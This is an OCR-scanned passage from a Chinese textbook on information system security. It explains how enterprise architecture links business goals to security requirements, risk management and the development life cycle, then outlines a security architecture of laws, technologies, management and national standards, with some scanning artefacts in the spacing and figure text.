的 业务 管理 者 都 不 可 避免 地 要 求 信息 系统 有 一 定 的 服务 质量 水平) 保证 (Service Level 
Agreement，SLA)， 其 中 ， 相 当 重 要 的 部 分 的 质量 是 属于 安全 保障 (Security Assurance). 
信息 系统 的 安全 质量 需要 组 织 管理 层 的 积极 参与 才能 得 到 应 有 的 保障 。 管 理 层 在 信息 安 
全 管理 问题 上 可 以 发 挥 不 同 层面 的 作用 ， 例 如 ， 组 织 管理 者 确定 信息 系统 安全 的 含义 、 
业务 管理 者 判断 业务 承受 风险 的 能 力 、 系 统 安全 管理 者 制定 风险 控制 措施 与 管理 策略 等 。 

信息 系统 存在 的 意义 关键 是 为 其 业务 目标 和 组 织 目标 服务 ， 在 构建 信息 系统 过 程 中 
所 考虑 的 各 种 因素 也 必须 以 此 为 核心 。 信 息 系 统 的 安全 需求 是 根据 信息 系统 要 满足 的 安 
全 目标 而 来 的 ， 而 安全 目标 又 是 由 其 组 织 和 业务 的 管理 目标 而 来 的 。 下 面 举 例 来 说 明 其 
中 的 道理 。 
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一 般 而 言 ， 信 息 安 全 的 理论 研究 涉及 以 下 基本 属性 : 机 密 性 、 完 整 性 、 可 用 性 、 真 
实 性 、 可 审计 性 、 抗 抵赖 性 、 可 靠 性 等 。 安 全 需求 的 目标 就 是 要 确保 信息 系统 有 足够 的 
保护 措施 以 达到 这 些 基 本 属性 ， 所 以 这 些 基本 属性 也 称 为 安全 目标 。 但 这 些 理论 的 定义 
又 不 一 定 能 满足 实际 需要 。 

组 织 一 般 需 要 从 自身 的 实际 情况 考虑 ， 在 安全 风险 与 系统 成 本 之 间 做 出 平衡 。 不 同 
的 组 织 《〈 甚 至 在 同一 组 织 的 不 同 部 门 ) 都 会 因为 业务 特点 而 只 对 某 些 安全 属性 更 重视 。 
所 以 ， 从 属于 不 同 组 织 的 信息 系统 就 很 可 能 有 不 一 样 的 安全 目标 。 比 如 ， 一 般 企业 的 电 
子 商务 系统 和 国家 部 门 的 电子 政务 系统 之 间 的 安全 需求 就 有 很 大 的 区 别 ， 信 息 系统 的 不 
同 部 分 又 有 不 一 样 的 安全 目标 。 

因此 ， 在 构建 一 个 安全 信息 系统 之 前 ， 首 先 要 分 析 组 织 对 于 安全 的 理解 是 怎样 的 ， 
组 织 的 领导 者 和 管理 人 员 希 望 信息 系统 能 满足 组 织 哪 一 方面 的 安全 需求 ， 然 后 才能 谈 安 
全 标准 、 安 全 技术 等 概念 的 具体 实现 。 

然而 ， 组 织 的 管理 人 员 不 一 定 是 安全 专家 或 技术 专家 。 那 么 ， 如 何 来 获取 和 分 析 他 
们 对 于 安全 的 需求 呢 ? 如 何 让 来 自 不 同 领域 的 人 员 对 信息 系统 所 要 实现 的 安全 目标 达成 
共识 呢 ? 如 何在 构建 设计 信息 系统 的 过 程 中 ， 对 于 每 一 个 安全 需求 是 否 得 到 实现 和 评估 
效果 进行 跟踪 呢 ? 这 些 疑问 促使 信息 系统 研究 者 和 设计 者 去 寻求 一 种 工具 ， 这 种 工具 将 
便于 他 们 理解 组 织 的 业务 目标 、 信 息 需 求 、 技 术 环境 现状 、 解 决 方案 等 信息 ， 以 实现 安 
全 信息 系统 的 构建 。 

针对 这 需要 ， 可 以 利用 组 织 体系 结构 (Enterprise Architecture，EA) 这 个 信息 管理 领域 
的 概念 来 解决 管理 人 员 与 技术 人 员 之 间 的 沟通 问题 。 作 为 一 个 信息 管理 的 工具 ，EA 提 
供 了 一 个 抽象 描述 组 织 信息 体系 的 多 视角 的 框架 ， 能 更 有 效 地 把 信息 安全 的 问题 引入 这 
个 多 视角 的 框架 里 ， 让 不 同 部 门 的 人 员 沟通 、 了 解 并 得 到 更 符合 实际 需要 的 分 析 。 

2. 组织 体系 结构 

本 节 先 解释 组 织 体系 结构 的 定义 ， 介 绍 组 织 体系 结构 在 信息 系统 安全 的 作用 ， 最 后 
介绍 组 织 体系 结构 的 多 层面 结构 与 概念 框架 。 

组 织 体系 结构 (Enterprise Architecture, EA), 也 可 译 为 “组 织 架 构 ” 或 者 “企业 架构 ”。 
这 是 在 信息 管理 领域 开始 受到 广泛 重视 的 一 个 概念 ， 也 是 用 于 帮助 组 织 理解 其 自身 的 构 
造 及 运作 方式 的 一 种 管理 工具 。EA 一 般 用 于 组 织 应 对 日 益 增长 的 复杂 性 ， 优 化 组 织 所 
拥有 的 技术 资源 。 从 安全 角度 考虑 ，EA 的 建立 有 助 组 织 深 入 地 了 解 和 认识 组 织 内 部 的 
每 一 个 子 系统 、 子 系统 之 间 乃 至 与 其 他 组 织 之 间 的 交互 和 安全 影响 ， 例 如 ， 系 统 间 信息 
数据 流 的 输入 /输出 情况 的 安全 影响 。 

通过 EA 的 管理 框架 ， 组 织 可 以 合理 有 序 地 把 安全 考虑 加 入 信息 系统 开发 生命 周期 
(System Development Life-Cycle，SDLC) 里 , 在 整个 SDLC 过 程 中 进行 组 织 内 信息 系统 的 
安全 目标 分 析 、 安 全 风险 评估 、 安 全 保护 等 级 确认 、 安 全 保护 措施 选择 、 安 全 区 域 职责 
划分 、 安 全 事故 处 理 、 安 全 责任 追究 时 ， 可 以 提供 更 全 面 、 切 实 的 参考 。 
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组 织 在 信息 化 建设 与 管理 中 ， 在 为 信息 系统 实现 安全 保护 和 风险 管理 进行 资金 提供 
和 计划 决策 时 ， 至 少 涉 及 三 个 不 同 的 决策 群体 或 参与 建设 的 团队 : 

。 信息 安全 管理 负责 人 和 专业 人 员 ; 

。 信息 技术 管理 负责 人 和 专业 人 员 ; 

。 非 技术 的 业务 管理 者 和 专业 人 员 。 

组 织 在 建构 信息 系统 、 讨 论 资金 投入 、 评 估 信 息 安全 保障 措施 的 成 本 效益 时 ， 都 需 
要 这 三 个 团队 对 信息 安全 形成 一 致 的 认识 。 但 是 ， 不 同 领域 的 专业 人 员 会 从 自身 所 处 的 
角度 出 发 去 考虑 ， 一 般 很 难 达成 共识 。 因 此 ， 组 织 信息 化 建设 与 信息 系统 安全 管理 的 工 
作 非 常 需要 一 种 管理 工具 来 促进 各 方面 人 员 在 信息 系统 安全 问题 上 的 沟通 ， 同 时 ， 通 过 
在 一 个 组 织 内 通用 的 系统 体系 框架 作为 信息 系统 安全 需求 的 共识 磋商 的 平台 ， 以 达到 把 
各 方面 的 需求 都 统一 到 这 一 个 框架 中 。 

EA 是 一 种 基于 组 织 业 务 目标 ， 对 信息 系统 进行 构建 和 改进 的 方法 和 管理 工具 。 因 
此 ， 组 织 在 设计 或 对 现 有 系统 进行 升级 更 新 时 ， 都 可 以 利用 EA 对 已 有 的 信息 系统 进行 
分 析 。 

目前 在 大 型 企业 和 政府 部 门 等 管理 领域 内 ，EA 是 一 种 比较 成 熟 的 管理 工具 。 国 外 
很 多 跨国 企业 和 政府 机 关 〔 例 如 ， 微 软 的 MS.EA 和 美国 联邦 政府 的 Federal EA 等 ), 已 
经 投入 大 量 资源 来 开发 结合 自身 情况 的 EA HEAR. EA 作为 一 个 管理 工具 而 言 , 对 信息 安 
全 研究 有 以 下 优点 : 

其 一 ，EA 是 一 个 比较 成 熟 的 管理 概念 与 工具 ， 国 外 企业 和 政府 机 关 已 经 获得 比较 
广泛 的 应 用 ， 在 我 国 也 开始 有 一 些 应 用 。 

EZ, EA 的 多 层面 兼顾 了 业务 与 技术 发 展 问题 。 一 个 典型 的 EA 具有 业务 体系 
(Business Architecture) 、 信 息 体 系 (Information Architecture)、 和 解决 体系 (Solution 
Architecture)、 技 术 体系 (Technology Architecture) 等 四 个 层面 结构 ， 这 个 多 层面 的 特点 兼 
顾 业 务 与 技术 的 发 展 。 同 时 ， 在 很 多 企业 ， 实 现 EA 架构 的 过 程 也 是 企业 内 部 信息 系统 
的 重 构 过 程 ， 由 首席 信息 官 (Chief Information Officer，CTO) 来 负责 ， 这 一 实际 设计 有 助 
于 考虑 信息 安全 的 技术 与 管理 问题 及 业务 与 安全 的 整合 。 

其 三 ，EA 本 身 的 重要 作用 。 在 国际 上 ， 经 过 十 几 年 的 实践 ，EA 已 经 是 一 个 很 成 熟 
的 方法 论 体 系 ， 欧 美国 家 的 一 些 企业 都 把 EA 架构 能 力作 为 评估 企业 信息 化 成 熟 度 的 核 
心 要 素 。 可 以 预计 ， 在 不 和 久 的 将 来 ， 中 国 的 政府 部 门 及 企业 也 会 逐步 采用 和 推广 EA 体 
系 结构 ， 达 到 合理 有 序 、 不 断 提升 自己 的 信息 化 水 平 的 目的 。 因 此 ， 在 进行 信息 安全 管 
理 分 析 时 ， 采 用 EA 这 一 方法 体系 非常 重要 。 

前 面 介绍 了 组 织 体系 结构 的 定义 和 组 织 体 系 结构 对 信息 系统 安全 的 作用 ， 下 面 解释 
组 织 体系 结构 的 多 层面 结构 与 概念 框架 。EA 既是 组 织 进行 改革 的 一 个 系统 性 过 程 ， 也 
是 一 种 方法 论 ， 在 应 用 EA 于 信息 安全 领域 时 ， 着 重 从 EA 体系 框架 的 多 层 架 构 进 行 分 
析 和 探讨 。EA 包含 四 层 架 构 ， 这 四 层 体 系 结构 也 可 视 为 对 组 织 信息 化 的 四 种 视角 。 
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(1) 业务 体系 结构 (Business Architecture) 

业务 体系 结构 是 对 业务 功能 的 架构 性 描述 ， 定 义 了 组 织 内 部 所 有 业务 系统 的 结构 和 
内 容 ， 包 括 系统 处 理 的 信息 和 提供 的 服务 功能 。 

(2) 信息 体系 结构 (Information Architecture) 

信息 体系 结构 是 对 通过 数据 模型 实现 信息 功能 的 架构 性 描述 ， 定 义 了 组 织 内 部 所 需 
要 和 使 用 的 信息 结构 (包括 相互 依赖 关系 ), 涉及 组 织 信息 的 结构 和 用 途 。 根据 组 织 的 战 
略 、 战 术 和 业务 方面 的 要 求 ， 组 织 可 对 信息 体系 结构 加 以 调整 。 

(3) 解决 方案 体系 结构 (Solution Layout Architecture) 

解决 方案 体系 结构 是 对 业务 应 用 系统 的 解决 方案 和 功能 的 架构 性 描述 ， 是 关于 软件 
系统 、 指 导 组 织 的 体系 结构 类 型 的 重要 决策 集合 。 

(4) 信息 技术 体系 结构 information Technology Architecture) 

信息 技术 体系 结构 是 对 信息 技术 的 基础 设施 和 功能 的 架构 性 描述 ， 定 义 了 整个 信息 
系统 中 的 技术 环境 和 基础 结构 的 平台 ,包括 网 络 、 操 作 系 统 、 数 据 库 、 存 储 器 、 处 理 器 、 
安全 基础 建设 、 系 统 运 维 等 技术 模块 。 信 息 技术 体系 结构 是 IT 人 员 较 为 熟悉 的 部 分 。 

EA 的 总 体 体系 框架 把 这 四 个 结构 (业务 体系 结构 、 信 息 体系 结构 、 解 决 方案 体系 
结构 和 信息 技术 体系 结构 系统 有 序 地 关联 在 一 起 。 通 过 这 个 体系 框架 ， 可 以 更 清晰 地 
把 一 个 视角 的 考虑 确定 为 另 一 个 视角 的 需求 。 例 如 ，EA 可 以 让 技术 人 员 明 白 ， 信 息 技 
术 体 系 结构 的 建设 目标 是 组 织 为 获取 商业 利润 、 实 现 组 织 目 的 的 产物 。 这 意味 着 ， 即 使 
是 信息 技术 体系 结构 也 不 是 纯粹 的 技术 问题 。 

这 四 个 视角 的 体系 结构 是 信息 安全 需求 的 主要 来 源 方向 ， 也 是 信息 安全 的 最 终 目 标 
和 落脚 点 。 

在 描述 组 织 体系 结构 时 , 一 般 采 用 框架 (Framework) 的 概念 来 实现 。 框 架 是 一 种 详细 
地 表述 体系 结构 的 模式 ， 也 可 视 为 一 种 通用 语言 ， 可 以 用 来 开发 EA， 也 可 用 来 管理 、 
设计 、 描 述 EA. EA 体系 框架 与 具体 组 织 设 置 和 具体 技术 可 以 分 开 考虑 ， 因 此 ，EA 体 
系 框架 的 概念 可 以 适合 各 种 领域 。 

目前 ， 比 较 通 用 的 框架 主要 有 开放 组 织 体系 结构 框架 (The Open Group Architecture 
Framework，TOGAF)， 扩 展 性 组 织 架 构 框 架 (Extended Enterprise Architecture Framework, 
E2AF)， 组 织 架 构 计 划 (Enterprise Architecture Planning，EAP)， 联 邦 政府 组 织 架 构 框 架 
(Federal Enterprise Architecture Framework，FEAF)， 集 成 架构 框架 (Integrated Architecture 
Framework，IAF)， 信 息 管理 的 技术 体系 结构 框架 (Technical Architecture Framework for 
Information Management，TAFIM) 等 。 对 EA 及 体系 框架 有 浓厚 兴趣 的 读者 可 查询 相关 资 
料 以 便 深入 了 解 。 

前 面 介绍 了 组 织 体系 结构 的 定义 和 组 织 体系 结构 在 信息 系统 安全 的 作用 ， 也 解释 了 
组 织 体系 结构 的 多 层面 结构 与 概念 框架 。 下 面 介绍 组 织 体系 结构 在 信息 系统 安全 领域 里 
的 一 些 具体 安排 应 用 。 然 后 是 对 EA 的 具体 应 用 领域 和 方法 的 介绍 。 
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(1) EA 信息 系统 开发 生命 周期 (Security Considerations of SDLC，SC of SDLC) 中 各 
阶段 的 应 用 。 

EA 在 SDLC 的 各 阶段 中 都 有 具体 应 用 ， 但 最 主要 影响 的 范围 还 是 在 前 期 。 

© 初始 阶段 。 

便于 管理 人 员 的 理解 ， 获 得 高 层 管理 者 的 支持 和 人 力 物 力 的 支持 ， 所 有 涉及 人 员 形 
成 安全 共识 ; 提出 信息 系统 的 预期 目标 ， 并 在 SDLC 中 各 阶段 都 关注 其 实现 情况 。 

@ 需求 分 析 阶 段 。 

进行 安全 目标 分 析 和 安全 需求 分 析 。 启 动 立项 以 及 之 前 的 安全 需求 分 类 ， 是 构建 信 
息 系统 过 程 中 最 重要 的 阶段 。 很 多 信息 系统 构建 失败 的 原因 是 需求 不 完整 或 不 正确 ， 因 
此 ， 通 过 EA 将 对 业务 和 业务 需求 有 更 深刻 的 了 解 。 安 全 需求 是 由 组 织 体系 结构 四 个 层 
次 的 需求 提取 汇集 而 来 的 ， 分 别 是 业务 需求 、 信 息 需 求 ， 解 决 方案 需求 、 信 息 技术 需求 。 
这 些 需求 共同 决定 了 信息 系统 的 安全 需求 。 

© 系统 设计 阶段 。 

利用 框架 描述 目前 信息 系统 ， 包 括 所 面临 的 问题 、 安 全 分 类 、 集 成 方式 等 信息 。 从 
信息 技术 体系 结构 这 一 层面 的 分 析 对 系统 的 设计 和 实现 尤其 重要 ， 将 关系 到 新 的 信息 系 
统 的 设计 和 实现 。 有 具体 需要 了 解 的 内 容 或 领域 包括 : 网 络 、 系 统 和 网 络 管理 环境 、 基 础 
应 用 程序 、 物 理 安全 环境 。 

此 外 , 在 SDLC 各 阶段 还 需 提供 管理 层 易 于 理解 的 和 基于 业务 考虑 的 风险 评估 审计 
报告 。 

(2) EA 在 风险 管理 、 识 别 、 评 估 和 控制 中 的 应 用 。 

O 风险 管理 、 识 别 中 的 应 用 。 

信息 安全 管理 负责 人 和 专业 人 员 、 信 息 技术 管理 负责 人 和 专业 人 员 ， 以 及 非 技术 的 
业务 管理 者 和 专业 人 员 ， 这 三 个 团队 是 设计 信息 系统 的 关键 人 员 。 在 进行 有 效 的 风险 管 
理 之 前 ， 这 三 个 团队 的 管理 者 ， 首 先 ， 必 须 了 解 组 织 运 作 的 薄弱 环节 之 所 在 ; 其次， 是 
了 解 组 织 的 信息 如 何 处 理 、 存 储 和 传输 ， 以 及 组 织 提供 用 于 信息 安全 风险 管理 的 资源 。 
只 有 这 样 ， 才 能 制定 出 合理 的 安全 战略 防御 计划 和 进行 风险 识别 管理 。 

在 评估 信息 资产 价值 时 ， 设 计 者 需要 确定 信息 资产 的 相对 价值 ， 以 体现 其 相对 重要 
性 ， 这 也 需要 从 组 织 的 任务 或 组 织 目标 出 发 。 例 如 ， 怎 样 才能 使 资产 带 来 最 大 效益 ?能 
使 组 织 利润 最 大 化 ?这 些 问 题 都 不 是 信息 安全 部 门 所 知道 的 信息 ， 需 要 业务 部 门 、 财 务 
部 门 的 参与 和 合作 。 

@ 风险 控制 中 的 应 用 

从 EA 的 不 同 视角 出 发 ， 在 选择 风险 控制 的 实施 手段 时 进行 可 行 性 分 析 ， 包 括 成 本 
/ 效益 分 析 、 技 术 可 行 性 分 析 、 政 策 可 行 性 分 析 、 组 织 可 行 性 分 析 、 运 作 可 行 性 分 析 ， 
这 也 是 EA 的 具体 应 用 。 例 如 ， 针 对 安全 风险 对 业务 影响 的 判断 的 问题 ， 在 识别 威胁 并 
划分 防御 处 理 优先 级 别 时 ， 也 需要 统计 人 员 或 财务 人 员 的 参与 ， 务 求 在 业务 风险 与 信息 
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系统 建设 成 本 之 间 取 得 平衡 的 理智 判断 。 在 这 个 问题 上 ， 使 用 EA 的 目的 是 评定 选择 、 
估计 成 本 、 考 虑 选择 的 相对 优势 ， 以 及 衡量 各 种 控制 方案 的 效益 。 
EA 也 可 以 应 用 到 组 织 的 信息 安全 战略 规划 和 信息 安全 体系 结构 的 设计 过 程 中 ， 如 


图 7-9 所 示 。 
组 织 信息 安全 战略 规划 和 组 织 信息 安全 体系 结构 设计 过 程 > 


业务 目标 ` 安 全 需 
求 、 关 键 成 功 要 
素 、 功 能 、 结 构 、 
组 织 约束 组 织 环 
境 


信息 系统 成 功 
要 素 、 安 全 目 


标 ` 安 全 标准 、 
相关 法 规 政策 


解决 方案 和 
应 用 程序 体 
系 结构 


解决 方案 和 
应 用 程序 体 
系 结构 


图 7-9 信息 安全 战略 规划 和 信息 安全 体系 结构 的 设计 过 程 


(3) 组 织 改 革 和 人 力 资源 管理 。 

EA 可 以 应 用 到 组 织 改 革 和 人 力 资 源 管理 方面 。 利 用 EA， 组 织 可 以 选择 或 设计 一 种 
基于 组 织 安全 考虑 的 组 织 设置 和 人 员 编 制 ， 进 行 组 织 改革 ， 以 达到 对 信息 安全 的 管理 机 
制 、 管 理 模式 的 支持 。 不 同 的 企业 ， 其 安全 需求 程度 、 侧 重点 不 同 ， 必 将 影响 其 实现 信 
息 安全 规划 的 机 制 、 方式。 在 决定 信息 安全 组 织 设置 后 , 再 决定 其 角色 设 定 和 职责 任务 。 
在 聘用 信息 安全 专家 或 者 对 信息 安全 职位 进行 招聘 信息 介绍 时 ， 可 利用 EA 将 职位 需求 
信息 设计 成 易于 为 各 方 理解 的 通用 描述 。 信 息 安全 要 将 员工 的 招聘 、 雇 用 、 考 核 等 纳入 
安全 考虑 ， 这 也 需要 人 力 资源 部 门 的 理解 和 支持 。 

最 后 ， 来 总 结 一 下 组 织 体系 结构 在 信息 系统 安全 领域 的 一 些 重要 影响 
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首先 , EA 把 管理 和 业务 的 考虑 合理 有 序 地 引入 信息 系统 安全 设计 中 , 通过 EA 的 总 
体 框 架 ， 明 确 地 提出 信息 系统 的 安全 并 不 是 一 个 单纯 的 技术 问题 ， 而 制定 信息 系统 安全 
目标 的 依据 是 管理 的 目标 和 业务 需求 。 

其 次 ， 信 息 系统 的 设计 和 管理 都 应 基于 业务 考虑 ， 并 有 明确 的 安全 目标 : 某 一 信息 
系统 的 运行 要 符合 组 织 业务 发 展 的 需求 ， 提 高 业务 竞争 能 力 ， 并 且 在 防范 风险 的 投入 成 
本 与 须 利 是 平衡 的 。 所 谓 的 安全 目标 ， 是 指 安全 的 信息 系统 并 不 是 单纯 地 要 满足 安全 的 
理论 定义 的 要 求 ， 而 是 为 了 组 织 的 利益 不 受 损害 这 一 根本 的 安全 目标 ， 来 进行 设计 和 
管理 。 

再 次 ， 组 织 在 设计 大 型 信息 系统 时 ， 要 考虑 组 织 自身 的 结构 ， 信 息 系统 要 与 现 有 的 
组 织 机 制 相 对 应 。 以 税务 信息 系统 为 例 ， 税 务 从 业务 上 分 为 几 个 部 门 ， 则 信息 系统 在 设 
计时 也 可 按照 业务 角度 设计 ， 在 组 织 里 ， 内 部 信息 系统 也 应 按 具体 部 门 功能 的 区 别 分 为 
后 勤 、 仓 库存 储 、 业 务 、 采 购 等 子 系统 ， 在 信息 系统 设计 的 同时 ， 要 启动 相应 的 管理 制 
度 和 操作 规范 的 制定 工作 ， 以 确保 有 组 织 管理 层面 的 基础 。 

因此 ， 采 用 EA 将 对 信息 系统 的 构建 和 改进 产生 非常 重大 的 影响 ， 本 部 分 主要 关注 
EA 对 信息 系统 安全 的 影响 。 

3. 安全 信息 系统 开发 概述 

安全 信息 系统 的 设计 过 程 引入 并 遵循 信息 系统 开发 生命 周期 (nformation System 
Development Life Cycle，SDLC) 进 行 。 除 此 之 外 ， 还 特别 在 设计 过 程 中 引入 安全 考虑 ， 
因此 ， 又 可 视 为 “信息 系统 安全 开发 生命 周期 ”(Information Security Considerations of 
SDLC, TSC of SDLC) GEI FEMA). 

安全 需求 分 析 在 信息 系统 设计 初期 进行 ， 为 了 满足 这 些 安全 需求 开发 初期 是 从 安全 
需求 分 析 开 始 的 。 正 如 之 前 解释 的 ， 安 全 需求 是 依据 组 织 管理 层 对 法 律 、 治 理 、 业 务 、 
成 本 等 问题 的 综合 考虑 后 的 判断 。 当 管理 层 确定 了 信息 系统 安全 的 含义 与 定义 ， 并 给 予 
相应 的 资源 支持 后 ， 开 发 团队 便 以 此 为 核心 考虑 对 信息 系统 安全 需求 进行 全 局 的 深入 分 
析 。SDLC 的 各 阶段 都 要 有 相应 的 安全 考虑 ， 因 此 ，SDLC 的 安全 措施 与 步骤 可 视 为 安 
全 需求 的 具体 实现 。 
进行 安全 需求 分 类 ， 则 是 源 于 之 前 的 安全 依据 阶段 的 结果 : 安全 需求 要 遵循 国家 的 
法 律 法 规 政策 要 求 ， 要 有 利于 组 织 业 务 目 标的 实现 ， 是 组 织 安全 目标 的 细 化 结果 ， 是 通 
过 利用 EA 分 析 后 归 类 而 得 来 的 。 在 信息 系统 构建 的 初始 阶段 ， 各 种 安全 目标 和 安全 需 
求 被 确定 后 ， 将 在 各 阶段 具体 实现 和 满足 。 
7.2.1.3 ”信息 系统 安全 设计 应 遵循 的 基本 原则 

经 过 以 上 对 信息 系统 安全 需求 的 介绍 ， 可 以 总 结 出 一 些 实际 的 、 有 用 的 安全 信息 系 
统 构建 原则 。 

在 初始 阶段 和 设计 阶段 ， 为 了 确保 信息 系统 的 安全 属性 真正 达到 设计 时 确定 的 安全 
目标 ， 安 全 设计 可 以 参照 以 下 几 个 设计 原则 : 
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。 需要 对 应 用 系统 进行 风险 分 析 ; 

。 确认 安全 风险 并 将 安全 需求 具体 化 ; 

。 通过 在 应 用 中 实现 安全 机 制 来 满足 安全 需求 ; 

。 安全 机 制 被 正确 地 设计 。 

在 实施 阶段 至 最 终 处 理 阶段 ， 安 全 设计 可 以 参照 以 下 儿 个 设计 原则 : 

。 需要 正确 地 实施 安全 机 制 ; 

。 需要 正确 地 配置 安全 属性 ; 

。 需要 正确 地 使 用 和 管理 安全 属性 ; 

。 针对 信息 系统 的 安全 管理 有 清晰 的 安全 目标 ; 

。 安全 管理 包括 对 安全 需求 的 管理 ， 例 如 ， 要 对 风险 和 成 本 进行 平衡 ， 以 确保 满足 

管理 目标 。 

在 安全 信息 系统 构建 过 程 中 ， 需 要 遵循 这 些 原则 采取 具体 的 机 制 和 措施 ， 以 求 达到 
安全 目标 和 安全 需求 。 但 是 ， 仅 仅 有 原则 是 不 够 的 ， 在 下 面 ， 将 具体 介绍 如 何在 信息 系 
统 的 具体 构造 过 程 使 用 这 些 原则 来 开发 安全 的 信息 系统 。 


7.2.2 信息 系统 安全 的 设计 
7.2.2.1 ”信息 系统 安全 体系 


信息 系统 安全 体系 (Information Systems Security Architecture，ISSA)， 包 括 信息 系统 
安全 技术 体系 、 安 全 管理 体系 、 安 全 标准 体系 和 安全 法 律 法 规 ， 其 基本 框架 如 图 7-10 所 示 。 


安全 技术 体系 


托管 服务 
认证 ， 访 问 控制 ， 审 计 


法 律 法 规 与 政策 中 间 件 ，PKL, 消息 
防 病毒 , 加密 ,访问 控制 , IDS A 
防火 墙 ,VPN 规 
安全 实现 E 
法 律 法 规 
be An SID. >. 系 
ees 安全 设计 与 计划 
机 构 政策 | 风险 管理 与 控制 
出 | 风险 分 析 与 评估 
| 安全 需求 
| 安全 目标 
安全 管理 体系 


图 7-10 信息 系统 安全 体系 框架 
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1. 信息 系统 相关 法 律 法 规 

首先 是 安全 法 律 法 规 与 政策 。 其 中 包括 法 律 法 规 、 组 织 结构 、 组 织 政策 和 业务 需求 
等 内 容 。 解 决 系统 安全 第 一 步 ， 要 和 弄 清楚 系统 可 以 提供 什么 样 的 服务 ， 即 业务 需求 。 在 
设计 安全 系统 之 前 ， 相 关 部 门 可 对 这 个 系统 进行 安全 评估 ， 安 全 评估 的 过 程 通常 会 比较 
关心 以 下 问题 : 

D 该 系统 提供 什么 样 的 服务 ? 不 同 的 服务 会 面临 什么 不 同 的 风险 ? 

@ 该 服务 给 整个 系统 会 带 来 什么 样 的 风险 ? 预计 该 服务 所 占 总 业务 的 比例 是 多 
少 ? 如 果 系 统 因 某 些 原 因而 瘫痪 的 话 ， 整 个 实体 单位 正常 业务 将 会 受到 多 大 的 影响 ? 

@ 系统 的 业务 量 是 多 少 ? 每 个 交易 的 估 值 是 多 少 ? 根据 数据 算出 每 天 的 风险 量 ， 
来 看 是 否 能 承担 这 个 风险 ， 即 进行 风险 和 价值 的 总 体 评估 。 如 果 不 能 承担 ， 就 会 要 求 降 
低 网 上 的 处 理 量 ， 或 者 需要 提高 安全 保护 。 

@ 有 什么 样 的 保护 措施 ? 措施 效能 如 何 ? 

系统 设计 者 需要 针对 以 上 的 问题 做 基本 的 业务 风险 分 析 ， 以 确保 系统 自身 的 健康 运 
作 和 客户 对 系统 的 要 求 得 到 满足 。 设 计 安全 系统 时 ， 要 确保 客户 的 信心 不 被 破坏 ， 就 要 
确定 风险 是 什么 ， 出 现 安全 事故 时 候 由 谁 承 担 责任 等 。 当 这 些 问 题 存 在 不 确定 性 时 ， 用 
户 就 很 可 能 不 敢 使 用 系统 服务 。 因 此 ， 保 障 用 户 信心 是 安全 系统 的 核心 问题 ， 需 要 通过 
安全 措施 去 控制 风险 ， 提 高 确定 性 来 确保 用 户 信心 。 因 此 ， 风 险 管理 的 办 法 就 是 减少 系 
统管 理 的 不 确定 性 ， 就 需要 进行 风险 分 析 和 评估 ， 包 括 业 务 风 险 ; 然后， 再 进行 控制 风 
仿 、 管 理 风险 ， 最后， 要 确定 责任 。 

可 见 ， 整 套 安全 体系 都 归结 于 系统 的 设计 可 信和 问题 。 在 设计 之 前 要 了 解 管理 原则 、 
管理 目标 ， 从 管理 角度 来 考虑 安全 目标 和 安全 需求 。 用 户 的 身份 认证 、 用 户 指令 的 处 理 、 
执行 都 很 重要 。 总 之 ， 根 本 目的 就 是 在 确保 系统 自身 安全 性 的 前 提 下 ， 要 保障 用 户 对 系 
统 的 信任 ， 即 系统 与 用 户 之 间 的 双向 互信 。 

就 系统 所 面临 的 危险 来 说 ， 信 息 系统 面临 来 自 各 个 方面 的 安全 威胁 ， 从 角色 来 看 ， 
其 来 源 有 外 部 攻击 者 级 、 内 部 攻击 者 级 、 用 户 级 、 网 络 运 营 商 级 等 ， 这 就 需要 从 技术 、 
业务 、 管 理 等 不 同 角 度 去 考虑 。 因 此 ， 针 对 不 同 的 威胁 需要 有 不 同 的 安全 保护 ， 还 需要 
一 系列 有 效 的 安全 保护 措施 ， 即 除了 一 般 意义 的 安全 技术 外 ， 还 有 标准 条 款 、 审 计 、 保 
险 等 。 

2. 信息 系统 安全 技术 体系 

从 技术 角度 而 言 ， 通 用 的 安全 技术 体系 包括 以 下 的 模块 : 

。 信息 系统 硬件 安全 : 密码 机 、 密 码 加 速 卡 等 ; 

。 操作 系统 安全 : 防 病毒 、 访 问 控制 、 白 名 单 等 ; 

。 密码 算法 技术 : RSA, ECC, AES, 3DES; 
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。 安全 协议 技术 : CCITI X.509, ISO9798, TLS; 
。 访问 控制 RBAC、ACL 等 ; 
。 安全 传输 技术 : SSL、HTTPS 等 ; 
。 应 用 程序 安全 : S/MIME, PKCS 等 ; 
。 身份 识别 与 权限 管理 技术 : 指纹 、IC 卡 、USB Key 等 ; 
。 入 侵 检测 技术 和 防火 墙 技 术 等 。 
同时 ， 对 于 不 同 的 信息 系统 ， 根 据 其 应 用 场景 与 业务 的 不 同 ， 会 对 一 部 分 的 安全 技 
术 更 为 关注 ， 例 如 ， 在 金融 领域 ， 身 份 识 别 和 权限 管理 技术 、 访 问 控制 等 会 较为 得 到 重 
视 。 同 时 ， 不 同 的 行业 与 客户 也 会 由 于 自身 规模 、 业 务 、 安 全 风险 、 资 金 投入 等 不 同情 
况 ， 对 不 同 技术 进行 相应 的 取舍。 

3. 信息 系统 安全 管理 体系 

信息 系统 的 安全 管理 体系 ， 主 要 包括 以 下 内 容 : 

。 安全 目标 确定 ; 

。 安全 需求 获取 与 分 类 ; 

。 风险 分 析 与 评估 ; 

。 风险 管理 与 控制 ; 

。 安全 计划 制定 

。 安全 策略 与 机 制 实现 

。 安全 措施 实施 。 

信息 系统 的 构建 主要 围绕 系统 的 安全 目标 和 风险 管理 进行 。 在 系统 的 构建 过 程 中 ， 
设计 研发 人 员 首 先 要 考虑 信息 系统 在 安全 方面 需要 满足 哪些 安全 目标 ， 然 后 再 分 析 评 估 
所 面临 的 风险 。 值 得 一 提 的 是 ， 目 前 许多 信息 系统 的 安全 目标 通常 会 受 监管 组 织 的 法 律 
法 规 的 影响 ， 如 《计算 机 信息 系统 安全 等 级 划分 准则 》(GB 17859-1999)， 因 此 可 以 依据 
这 类 国家 或 者 行业 的 安全 规范 来 进行 相应 的 目标 评定 与 风险 评估 。 

4. 目前 信息 系统 安全 标准 体系 

目前 我 国 现 有 的 信息 系统 安全 标准 体系 可 分 为 基础 类 、 应 用 类 、 产 品类 。 其 中 基础 
类 有 《计算 机 信息 系统 安全 保护 等 级 划分 准则 》(GB 17859 一 1999)、《 信 息 系统 安全 等 
级 保护 基本 要 求 》(GB/T 22239—2008); 应 用 类 包括 信息 系统 定 级 类 : 《信息 系统 安全 
